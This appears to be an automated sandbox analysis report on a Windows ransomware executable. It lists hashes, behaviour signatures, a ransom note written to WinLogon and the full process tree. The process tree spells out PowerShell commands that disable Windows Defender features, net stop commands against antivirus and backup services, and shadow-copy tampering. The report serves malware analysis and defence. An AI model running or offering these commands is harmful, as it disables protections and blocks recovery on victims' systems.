Analysis
-
max time kernel
92s -
max time network
142s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
03-09-2020 14:38
Static task
static1
Behavioral task
behavioral1
Sample
58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
Resource
win7v200722
Behavioral task
behavioral2
Sample
58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
Resource
win10v200722
General
-
Target
58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
-
Size
82KB
-
MD5
e01e11dca5e8b08fc8231b1cb6e2048c
-
SHA1
4983d07f004436caa3f10b38adacbba6a4ede01a
-
SHA256
58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f
-
SHA512
298bfb9fe55ddd80f1c6671622d7e9e865899a855b5bb8e0d85d8520160cedca6fd8bc72c9881925477bcab883bf6e6f4c69f997b774b74fe992e023a81269de
Malware Config
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Blocklisted process makes network request 3 IoCs
Processes:
mshta.exeflow pid process 28 4436 mshta.exe 30 4436 mshta.exe 32 4436 mshta.exe -
Executes dropped EXE 1 IoCs
Processes:
c3eokz5t.exepid process 4404 c3eokz5t.exe -
Modifies extensions of user files 2 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exedescription ioc process File created C:\Users\Admin\Pictures\SplitMerge.tiff.crypted 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe File opened for modification C:\Users\Admin\Pictures\SplitMerge.tiff 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe -
Drops startup file 1 IoCs
Processes:
58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe -
Enumerates connected drives 3 TTPs 2 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
vssadmin.exedescription ioc process File opened (read-only) \??\h: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe -
Modifies WinLogon 2 TTPs 2 IoCs
Processes:
58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Your Files are Encrypted.\r\n\r\nDon’t worry, you can return all your files!\r\n\r\nYou've got 48 hours(2 Days), before you lost your files forever.\r\nI will treat you good if you treat me good too.\r\n\r\nThe Price to get all things to the normal : 20,000$\r\nMy BTC Wallet ID :\r\n1F6sq8YvftTfuE4QcYxfK8s5XFUUHC7sD9\r\n\r\nContact :\r\[email protected]\r\n" 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..." 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe -
Drops file in Windows directory 1 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\ServiceProfiles\LocalService\winhttp\cachev3.dat svchost.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Interacts with shadow copies 2 TTPs 14 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exepid process 5196 vssadmin.exe 4828 vssadmin.exe 4020 vssadmin.exe 4416 vssadmin.exe 5140 vssadmin.exe 6028 vssadmin.exe 3016 vssadmin.exe 4356 vssadmin.exe 4276 vssadmin.exe 780 vssadmin.exe 4904 vssadmin.exe 5608 vssadmin.exe 2108 vssadmin.exe 5824 vssadmin.exe -
Kills process with taskkill 3 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exepid process 5296 taskkill.exe 4872 taskkill.exe 5036 taskkill.exe -
Modifies data under HKEY_USERS 6 IoCs
Processes:
svchost.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecisionReason = "1" svchost.exe Set value (data) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecisionTime = 5b04d4251082d601 svchost.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecision = "0" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad svchost.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7 svchost.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exepowershell.exepid process 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 1336 powershell.exe 1336 powershell.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 1336 powershell.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
svchost.exe58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeShutdownPrivilege 408 svchost.exe Token: SeCreatePagefilePrivilege 408 svchost.exe Token: SeDebugPrivilege 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe Token: SeDebugPrivilege 1336 powershell.exe Token: SeIncreaseQuotaPrivilege 1336 powershell.exe Token: SeSecurityPrivilege 1336 powershell.exe Token: SeTakeOwnershipPrivilege 1336 powershell.exe Token: SeLoadDriverPrivilege 1336 powershell.exe Token: SeSystemProfilePrivilege 1336 powershell.exe Token: SeSystemtimePrivilege 1336 powershell.exe Token: SeProfSingleProcessPrivilege 1336 powershell.exe Token: SeIncBasePriorityPrivilege 1336 powershell.exe Token: SeCreatePagefilePrivilege 1336 powershell.exe Token: SeBackupPrivilege 1336 powershell.exe Token: SeRestorePrivilege 1336 powershell.exe Token: SeShutdownPrivilege 1336 powershell.exe Token: SeDebugPrivilege 1336 powershell.exe Token: SeSystemEnvironmentPrivilege 1336 powershell.exe Token: SeRemoteShutdownPrivilege 1336 powershell.exe Token: SeUndockPrivilege 1336 powershell.exe Token: SeManageVolumePrivilege 1336 powershell.exe Token: 33 1336 powershell.exe Token: 34 1336 powershell.exe Token: 35 1336 powershell.exe Token: 36 1336 powershell.exe Token: SeDebugPrivilege 2784 powershell.exe Token: SeDebugPrivilege 3016 powershell.exe Token: SeDebugPrivilege 3708 powershell.exe Token: SeDebugPrivilege 3520 powershell.exe Token: SeDebugPrivilege 2304 powershell.exe Token: SeDebugPrivilege 1800 powershell.exe Token: SeDebugPrivilege 3596 powershell.exe Token: SeDebugPrivilege 1716 powershell.exe Token: SeDebugPrivilege 1720 powershell.exe Token: SeDebugPrivilege 4140 powershell.exe Token: SeDebugPrivilege 4252 powershell.exe Token: SeDebugPrivilege 4352 powershell.exe Token: SeIncreaseQuotaPrivilege 3016 powershell.exe Token: SeSecurityPrivilege 3016 powershell.exe Token: SeTakeOwnershipPrivilege 3016 powershell.exe Token: SeLoadDriverPrivilege 3016 powershell.exe Token: SeSystemProfilePrivilege 3016 powershell.exe Token: SeSystemtimePrivilege 3016 powershell.exe Token: SeProfSingleProcessPrivilege 3016 powershell.exe Token: SeIncBasePriorityPrivilege 3016 powershell.exe Token: SeCreatePagefilePrivilege 3016 powershell.exe Token: SeBackupPrivilege 3016 powershell.exe Token: SeRestorePrivilege 3016 powershell.exe Token: SeShutdownPrivilege 3016 powershell.exe Token: SeDebugPrivilege 3016 powershell.exe Token: SeSystemEnvironmentPrivilege 3016 powershell.exe Token: SeRemoteShutdownPrivilege 3016 powershell.exe Token: SeUndockPrivilege 3016 powershell.exe Token: SeManageVolumePrivilege 3016 powershell.exe Token: 33 3016 powershell.exe Token: 34 3016 powershell.exe Token: 35 3016 powershell.exe Token: 36 3016 powershell.exe Token: SeIncreaseQuotaPrivilege 2784 powershell.exe Token: SeSecurityPrivilege 2784 powershell.exe Token: SeTakeOwnershipPrivilege 2784 powershell.exe Token: SeLoadDriverPrivilege 2784 powershell.exe Token: SeSystemProfilePrivilege 2784 powershell.exe Token: SeSystemtimePrivilege 2784 powershell.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exepid process 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe -
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exepid process 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 3888 wrote to memory of 1336 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe powershell.exe PID 3888 wrote to memory of 1336 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe powershell.exe PID 3888 wrote to memory of 2784 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe powershell.exe PID 3888 wrote to memory of 2784 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe powershell.exe PID 3888 wrote to memory of 3016 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe powershell.exe PID 3888 wrote to memory of 3016 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe powershell.exe PID 3888 wrote to memory of 3708 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe powershell.exe PID 3888 wrote to memory of 3708 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe powershell.exe PID 3888 wrote to memory of 2304 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe powershell.exe PID 3888 wrote to memory of 2304 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe powershell.exe PID 3888 wrote to memory of 3520 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe powershell.exe PID 3888 wrote to memory of 3520 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe powershell.exe PID 3888 wrote to memory of 1800 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe powershell.exe PID 3888 wrote to memory of 1800 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe powershell.exe PID 3888 wrote to memory of 3596 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe powershell.exe PID 3888 wrote to memory of 3596 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe powershell.exe PID 3888 wrote to memory of 1716 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe powershell.exe PID 3888 wrote to memory of 1716 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe powershell.exe PID 3888 wrote to memory of 1720 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe powershell.exe PID 3888 wrote to memory of 1720 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe powershell.exe PID 3888 wrote to memory of 4140 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe powershell.exe PID 3888 wrote to memory of 4140 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe powershell.exe PID 3888 wrote to memory of 4252 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe powershell.exe PID 3888 wrote to memory of 4252 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe powershell.exe PID 3888 wrote to memory of 4352 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe powershell.exe PID 3888 wrote to memory of 4352 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe powershell.exe PID 3888 wrote to memory of 4464 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe net.exe PID 3888 wrote to memory of 4464 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe net.exe PID 3888 wrote to memory of 4484 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe net.exe PID 3888 wrote to memory of 4484 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe net.exe PID 3888 wrote to memory of 4512 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe net.exe PID 3888 wrote to memory of 4512 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe net.exe PID 3888 wrote to memory of 4584 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe net.exe PID 3888 wrote to memory of 4584 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe net.exe PID 3888 wrote to memory of 4632 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe net.exe PID 3888 wrote to memory of 4632 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe net.exe PID 3888 wrote to memory of 4660 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe net.exe PID 3888 wrote to memory of 4660 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe net.exe PID 3888 wrote to memory of 4740 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe net.exe PID 3888 wrote to memory of 4740 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe net.exe PID 3888 wrote to memory of 4800 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe net.exe PID 3888 wrote to memory of 4800 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe net.exe PID 3888 wrote to memory of 4836 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe net.exe PID 3888 wrote to memory of 4836 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe net.exe PID 3888 wrote to memory of 4872 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe net.exe PID 3888 wrote to memory of 4872 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe net.exe PID 3888 wrote to memory of 4948 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe net.exe PID 3888 wrote to memory of 4948 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe net.exe PID 4464 wrote to memory of 4968 4464 net.exe net1.exe PID 4464 wrote to memory of 4968 4464 net.exe net1.exe PID 4484 wrote to memory of 5008 4484 net.exe net1.exe PID 4484 wrote to memory of 5008 4484 net.exe net1.exe PID 3888 wrote to memory of 5036 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe net.exe PID 3888 wrote to memory of 5036 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe net.exe PID 3888 wrote to memory of 2372 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe net.exe PID 3888 wrote to memory of 2372 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe net.exe PID 4512 wrote to memory of 4148 4512 net.exe net1.exe PID 4512 wrote to memory of 4148 4512 net.exe net1.exe PID 3888 wrote to memory of 4276 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe net.exe PID 3888 wrote to memory of 4276 3888 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe net.exe PID 4584 wrote to memory of 3648 4584 net.exe net1.exe PID 4584 wrote to memory of 3648 4584 net.exe net1.exe PID 4632 wrote to memory of 4492 4632 net.exe net1.exe PID 4632 wrote to memory of 4492 4632 net.exe net1.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe"C:\Users\Admin\AppData\Local\Temp\58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe"1⤵
- Modifies extensions of user files
- Drops startup file
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3888 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1336 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2784 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3016 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3708 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2304 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3520 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1800 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 62⤵
- Suspicious use of AdjustPrivilegeToken
PID:3596 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:1716 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 62⤵
- Suspicious use of AdjustPrivilegeToken
PID:1720 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 62⤵
- Suspicious use of AdjustPrivilegeToken
PID:4140 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4252 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 22⤵
- Suspicious use of AdjustPrivilegeToken
PID:4352 -
C:\Windows\SYSTEM32\net.exe"net.exe" stop avpsus /y2⤵
- Suspicious use of WriteProcessMemory
PID:4464 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop avpsus /y3⤵PID:4968
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McAfeeDLPAgentService /y2⤵
- Suspicious use of WriteProcessMemory
PID:4484 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y3⤵PID:5008
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mfewc /y2⤵
- Suspicious use of WriteProcessMemory
PID:4512 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfewc /y3⤵PID:4148
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BMR Boot Service /y2⤵
- Suspicious use of WriteProcessMemory
PID:4584 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y3⤵PID:3648
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y2⤵
- Suspicious use of WriteProcessMemory
PID:4632 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y3⤵PID:4492
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop DefWatch /y2⤵PID:4660
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DefWatch /y3⤵PID:4108
-
